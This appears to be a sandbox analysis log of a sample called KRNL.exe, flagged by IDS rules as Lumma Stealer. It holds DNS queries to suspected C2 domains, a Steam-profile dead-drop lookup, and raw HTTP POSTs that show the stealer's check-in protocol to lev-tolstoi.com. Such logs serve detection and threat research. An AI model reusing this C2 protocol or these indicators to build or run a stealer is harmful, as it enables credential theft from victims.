2025-01-01T21:27:58.298392+0100 | 2058588 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) | 1 | 192.168.2.4 | 53601 | 1.1.1.1 | 53 | UDP
2025-01-01T21:27:58.309461+0100 | 2058580 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) | 1 | 192.168.2.4 | 56972 | 1.1.1.1 | 53 | UDP
2025-01-01T21:27:58.319723+0100 | 2058590 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) | 1 | 192.168.2.4 | 53017 | 1.1.1.1 | 53 | UDP
2025-01-01T21:27:58.336400+0100 | 2058572 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) | 1 | 192.168.2.4 | 65432 | 1.1.1.1 | 53 | UDP
2025-01-01T21:27:58.358476+0100 | 2058576 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) | 1 | 192.168.2.4 | 58312 | 1.1.1.1 | 53 | UDP
2025-01-01T21:27:58.370472+0100 | 2058578 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) | 1 | 192.168.2.4 | 59352 | 1.1.1.1 | 53 | UDP
2025-01-01T21:27:59.029778+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 104.102.49.254 | 443 | TCP
2025-01-01T21:27:59.548271+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.4 | 49733 | 104.102.49.254 | 443 | TCP
2025-01-01T21:28:00.167445+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:00.594397+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49734 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:00.594397+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49734 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:01.084272+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:01.576540+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49735 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:01.576540+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49735 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:02.348216+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49736 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:03.506865+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:04.927121+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49738 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:06.365717+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:07.104797+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49739 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:08.097129+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:13.289406+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 172.67.157.254 | 443 | TCP
2025-01-01T21:28:13.765451+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49741 | 172.67.157.254 | 443 | TCP
TCP packet log (columns: Timestamp, Source Port, Dest Port, Source IP, Dest IP)
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.086000919 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.086222887 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.087364912 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.087387085 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.087433100 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576577902 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576630116 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576666117 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576682091 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576694965 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576756954 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576762915 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576797962 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576832056 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576837063 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576841116 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576883078 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576885939 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.577173948 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.577214956 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.577225924 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.577230930 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.577263117 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.581245899 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.620605946 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.665915966 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.665981054 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666011095 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666028976 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666034937 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666094065 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666098118 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666110992 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666153908 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666311979 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666323900 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666368961 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666374922 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.889947891 CET49736443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.889998913 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.890077114 CET49736443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.890394926 CET49736443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.890409946 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.348130941 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.348216057 CET49736443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.349628925 CET49736443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.349638939 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.349852085 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.351109028 CET49736443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.351274014 CET49736443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.351303101 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.351372004 CET49736443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.351378918 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.983479023 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.983620882 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.983695984 CET49736443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.983797073 CET49736443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.983817101 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.048425913 CET49737443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.048460960 CET44349737172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.048566103 CET49737443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.048815966 CET49737443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.048830986 CET44349737172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.506642103 CET44349737172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.506865025 CET49737443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.512383938 CET49737443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.512398958 CET44349737172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.512717009 CET44349737172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.513885975 CET49737443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.514004946 CET49737443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:03.514031887 CET44349737172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.290113926 CET44349737172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.290273905 CET44349737172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.290332079 CET49737443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.290415049 CET49737443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.290426016 CET44349737172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.455018044 CET49738443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.455080032 CET44349738172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.455173016 CET49738443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.455537081 CET49738443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.455555916 CET44349738172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.927046061 CET44349738172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.927120924 CET49738443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.928328991 CET49738443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.928338051 CET44349738172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.928538084 CET44349738172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.929630995 CET49738443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:04.929799080 CET49738443192.168.2.4172.67.157.254
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 1, 2025 21:27:58.265379906 CET | 63882 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 21:27:58.274060965 CET | 53 | 63882 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 21:27:58.277209997 CET | 65221 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 21:27:58.285598993 CET | 53 | 65221 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 21:27:58.287509918 CET | 59317 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 21:27:58.296370029 CET | 53 | 59317 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 21:27:58.298392057 CET | 53601 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 21:27:58.307514906 CET | 53 | 53601 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 21:27:58.309461117 CET | 56972 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 21:27:58.317655087 CET | 53 | 56972 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 21:27:58.319722891 CET | 53017 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 21:27:58.335031033 CET | 53 | 53017 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 21:27:58.336400032 CET | 65432 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 21:27:58.345901966 CET | 53 | 65432 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 21:27:58.358475924 CET | 58312 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 21:27:58.368380070 CET | 53 | 58312 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 21:27:58.370471954 CET | 59352 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 21:27:58.379169941 CET | 53 | 59352 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 21:27:58.381047964 CET | 61357 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 21:27:58.389082909 CET | 53 | 61357 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 21:27:59.665224075 CET | 60905 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 21:27:59.677926064 CET | 53 | 60905 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 21:28:30.159352064 CET | 53 | 56712 | 162.159.36.2 | 192.168.2.4
Jan 1, 2025 21:28:30.808635950 CET | 54109 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 21:28:30.816570044 CET | 53 | 54109 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 1, 2025 21:27:58.265379906 CET | 192.168.2.4 | 1.1.1.1 | 0x98a8 | Standard query (0) | mindhandru.buzz | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:58.277209997 CET | 192.168.2.4 | 1.1.1.1 | 0x9672 | Standard query (0) | prisonyfork.buzz | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:58.287509918 CET | 192.168.2.4 | 1.1.1.1 | 0x3ca | Standard query (0) | rebuildeso.buzz | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:58.298392057 CET | 192.168.2.4 | 1.1.1.1 | 0xf5c2 | Standard query (0) | scentniej.buzz | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:58.309461117 CET | 192.168.2.4 | 1.1.1.1 | 0x1d70 | Standard query (0) | inherineau.buzz | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:58.319722891 CET | 192.168.2.4 | 1.1.1.1 | 0xec7 | Standard query (0) | screwamusresz.buzz | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:58.336400032 CET | 192.168.2.4 | 1.1.1.1 | 0x80f | Standard query (0) | appliacnesot.buzz | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:58.358475924 CET | 192.168.2.4 | 1.1.1.1 | 0x7f5f | Standard query (0) | cashfuzysao.buzz | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:58.370471954 CET | 192.168.2.4 | 1.1.1.1 | 0xe2be | Standard query (0) | hummskitnj.buzz | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:58.381047964 CET | 192.168.2.4 | 1.1.1.1 | 0x1262 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:59.665224075 CET | 192.168.2.4 | 1.1.1.1 | 0x42de | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:28:30.808635950 CET | 192.168.2.4 | 1.1.1.1 | 0x93c0 | Standard query (0) | 206.23.85.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 1, 2025 21:27:58.274060965 CET | 1.1.1.1 | 192.168.2.4 | 0x98a8 | Name error (3) | mindhandru.buzz | none | none | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:58.285598993 CET | 1.1.1.1 | 192.168.2.4 | 0x9672 | Name error (3) | prisonyfork.buzz | none | none | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:58.296370029 CET | 1.1.1.1 | 192.168.2.4 | 0x3ca | Name error (3) | rebuildeso.buzz | none | none | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:58.307514906 CET | 1.1.1.1 | 192.168.2.4 | 0xf5c2 | Name error (3) | scentniej.buzz | none | none | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:58.317655087 CET | 1.1.1.1 | 192.168.2.4 | 0x1d70 | Name error (3) | inherineau.buzz | none | none | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:58.335031033 CET | 1.1.1.1 | 192.168.2.4 | 0xec7 | Name error (3) | screwamusresz.buzz | none | none | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:58.345901966 CET | 1.1.1.1 | 192.168.2.4 | 0x80f | Name error (3) | appliacnesot.buzz | none | none | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:58.368380070 CET | 1.1.1.1 | 192.168.2.4 | 0x7f5f | Name error (3) | cashfuzysao.buzz | none | none | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:58.379169941 CET | 1.1.1.1 | 192.168.2.4 | 0xe2be | Name error (3) | hummskitnj.buzz | none | none | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:58.389082909 CET | 1.1.1.1 | 192.168.2.4 | 0x1262 | No error (0) | steamcommunity.com |  | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:59.677926064 CET | 1.1.1.1 | 192.168.2.4 | 0x42de | No error (0) | lev-tolstoi.com |  | 172.67.157.254 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:27:59.677926064 CET | 1.1.1.1 | 192.168.2.4 | 0x42de | No error (0) | lev-tolstoi.com |  | 104.21.66.86 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:28:30.816570044 CET | 1.1.1.1 | 192.168.2.4 | 0x93c0 | Name error (3) | 206.23.85.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
• steamcommunity.com
• lev-tolstoi.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49733 | 104.102.49.254 | 443 | 2120 | C:\Users\user\Desktop\KRNL.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 20:27:59 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2025-01-01 20:27:59 UTC | 1905 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Wed, 01 Jan 2025 20:27:59 GMT
Content-Length: 35121
Connection: close
Set-Cookie: sessionid=eb57dd49dd895c3631208604; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-01 20:27:59 UTC | 14479 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-01 20:27:59 UTC | 16384 | IN | Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2025-01-01 20:27:59 UTC | 3768 | IN | Data Ascii: </div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_name"
2025-01-01 20:27:59 UTC | 490 | IN | Data Ascii: r Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div class="bt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49734 | 172.67.157.25 | 443 | 2120 | C:\Users\user\Desktop\KRNL.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 20:28:00 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lev-tolstoi.com
2025-01-01 20:28:00 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2025-01-01 20:28:00 UTC | 1121 | IN | HTTP/1.1 200 OK
Date: Wed, 01 Jan 2025 20:28:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=5kic491f94ui7dg8efk9jj9n10; expires=Sun, 27 Apr 2025 14:14:39 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g3J9VQd2uCot4sqVW1ZB3hLWEUPTOIWeRL01Qw%2BNpjtXYvEoWEDaqkTY%2FWBl4gpuWrLvYL9nvVItsIUWla2jDNX68c7ti5GWWt4jr8PJVTQCLJhPlQwyg2FKkmoE0R2Nnqw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fb540d57e2717b5-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1464&rtt_var=562&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1923583&cwnd=252&unsent_bytes=0&cid=2a4f74acb9396462&ts=438&x=0"
2025-01-01 20:28:00 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2025-01-01 20:28:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49735 | 172.67.157.25 | 443 | 2120 | C:\Users\user\Desktop\KRNL.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 20:28:01 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 51
Host: lev-tolstoi.com
2025-01-01 20:28:01 UTC | 51 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 32 39 39 31 32 35 33 35 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--629912535&j=
2025-01-01 20:28:01 UTC | 1119 | IN | HTTP/1.1 200 OK
Date: Wed, 01 Jan 2025 20:28:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=c1majle6bae5vfish6i596kge6; expires=Sun, 27 Apr 2025 14:14:40 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cI1JZxeWymFv0ABUHswjOFVNlwhgx8v4jHeMUXHeJmnGK5OdsDVrSZuoFBMA1Ti168TQP%2FxyYDRhKMquwYznFKZTPt24oYZNCYt6kHXcWWgSRkaOzOV3M5sFs0xz6fdmPtc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fb540db3eb1184d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1508&min_rtt=1502&rtt_var=576&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=950&delivery_rate=1880231&cwnd=239&unsent_bytes=0&cid=bcdc0c9d5b389b49&ts=500&x=0"
